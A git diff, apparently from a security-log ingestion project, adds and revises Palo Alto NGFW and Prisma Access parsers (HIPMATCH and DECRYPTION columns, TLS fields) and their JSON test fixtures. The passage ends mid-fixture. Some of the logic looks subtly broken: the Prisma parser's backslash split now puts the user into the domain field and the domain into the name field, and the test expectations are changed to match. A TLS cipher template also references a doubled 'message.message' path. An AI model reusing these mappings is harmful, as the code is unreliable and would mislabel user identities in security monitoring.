"{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index 3142ed671..e48b985ca 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -76,7 +76,7 @@ "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -97,9 +97,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json index f08a677ef..8eac8428d 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..d32952899 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json @@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json new file mode 100644 index 000000000..b0b294778 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json new file mode 100644 index 000000000..b4429340a --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json @@ -0,0 +1,74 @@ +{ + "input": { + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", + "event": { + "category": [ + "authentication" + ], + "dataset": "system", + "reason": "When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-26T21:10:01.627000Z", + "action": { + "name": "auth-success", + "type": "auth" + }, + "destination": { + "address": "1.7.4.2", + "ip": "1.7.4.2" + }, + "log": { + "hostname": "FWPAN00", + "level": "informational", + "logger": "system" + }, + "observer": { + "name": "FWPAN00", + "product": "PAN-OS", + "serial_number": "02410100000000" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "auth-success", + "Threat_ContentType": "auth", + "authetification": { + "profile": "FWPA" + }, + "server": { + "profile": "RADIUS_RSA" + }, + "vsys": "shared" + }, + "related": { + "ip": [ + "1.2.5.5", + "1.7.4.2" + ], + "user": [ + "test000555" + ] + }, + "source": { + "address": "1.2.5.5", + "ip": "1.2.5.5" + }, + "user": { + "name": "test000555" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index edd76521b..4962d00cc 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -82,7 +82,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "john.doe", "john.doe@example.org" ] }, @@ -103,9 +103,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.org", "email": "john.doe@example.org", - "name": "example.org" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml index 6382be28b..3b3fd8fc6 100644 --- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml @@ -297,3 +297,18 @@ paloalto.threat.name: description: The name of the threat name: paloalto.threat.name type: keyword + +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 113ef7fdb..d212c5fcc 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID @@ -235,12 +235,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID @@ -382,6 +382,167 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse @@ -577,7 +738,7 @@ stages: event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}" - host.id: "{{parsed_event.message.deviceExternalId}}" + host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" @@ -593,6 +754,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -602,7 +770,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" @@ -766,6 +934,9 @@ stages: paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}" paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}" paloalto.threat.name: "{{parsed_threat.message.threat_description}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: source.user.name: "{{parsed_event.message.SourceUser}}" user.name: "{{parsed_event.message.SourceUser}}" @@ -798,8 +969,8 @@ stages: set_finalize_user_name: actions: - set: - user.domain: '{{final.user.name.split("\\") | first}}' - user.name: '{{final.user.name.split("\\") | last}}' + user.domain: '{{final.user.name.split("\\") | last}}' + user.name: '{{final.user.name.split("\\") | first}}' filter: '{{final.user.name != null and "\\" in final.user.name}}' - set: user.domain: '{{final.user.email.split("@") | first}}' diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json index 1a4fba4b4..b32ea4d13 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json @@ -69,6 +69,7 @@ "1.1.1.1" ], "user": [ + "paloaltonetwork", "xxxxx" ] }, @@ -90,8 +91,8 @@ } }, "user": { - "domain": "paloaltonetwork", - "name": "xxxxx" + "domain": "xxxxx", + "name": "paloaltonetwork" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json index 512ae89e7..37c8000b9 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json @@ -62,6 +62,7 @@ "5.6.7.8" ], "user": [ + "domain", "pusername", "userdest" ] @@ -86,8 +87,8 @@ } }, "user": { - "domain": "domain", - "name": "pusername" + "domain": "pusername", + "name": "domain" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json index e4b1d5fab..e51f19fbb 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -46,6 +47,7 @@ "88.120.236.74" ], "user": [ + "example.org", "test" ] }, @@ -61,8 +63,8 @@ } }, "user": { - "domain": "example.org", - "name": "test" + "domain": "test", + "name": "example.org" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json new file mode 100644 index 000000000..8a060536e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No 